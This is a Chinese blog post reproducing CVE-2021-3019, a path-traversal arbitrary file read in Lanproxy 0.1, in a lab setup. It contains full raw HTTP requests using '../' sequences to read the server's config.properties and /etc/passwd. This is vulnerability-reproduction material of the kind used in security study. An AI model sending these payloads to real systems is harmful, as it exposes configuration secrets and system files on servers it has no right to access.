Lanproxy任意文件读取漏洞复现(CVE-2021-3019)

2021/5/2 10:26:55

本文主要是介绍Lanproxy任意文件读取漏洞复现(CVE-2021-3019),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

声明

好好学习,天天向上

漏洞描述

影响范围

复现过程

这里使用0.1版本

下载地址,复现只下载服务端版本即可,放在一个已经配置好java环境的linux的服务器中,proxy-server-0.1.zip

https://file.nioee.com/d/2e81550ebdbd416c933f/

执行

unzip proxy-server-0.1.zip
mv proxy-server-0.1 /usr/local/
vim /usr/local/proxy-server-0.1/conf/config.properties

看到了配置文件,不做修改

在这里插入图片描述

启动服务

cd /usr/local/proxy-server-0.1/bin
chmod +x startup.sh
./startup.sh

在这里插入图片描述

环境启动后,访问

http://192.168.31.64:8090/

在这里插入图片描述

BP抓包,修改为如下,可以看到刚刚的那个配置文件

GET /../conf/config.properties HTTP/1.1
Host: 192.168.31.64:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

查看passwd,如果第二次半天出不来,可重新抓个包修改

GET /../../../../../../etc/passwd HTTP/1.1
Host: 192.168.31.64:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

在这里插入图片描述



这篇关于Lanproxy任意文件读取漏洞复现(CVE-2021-3019)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程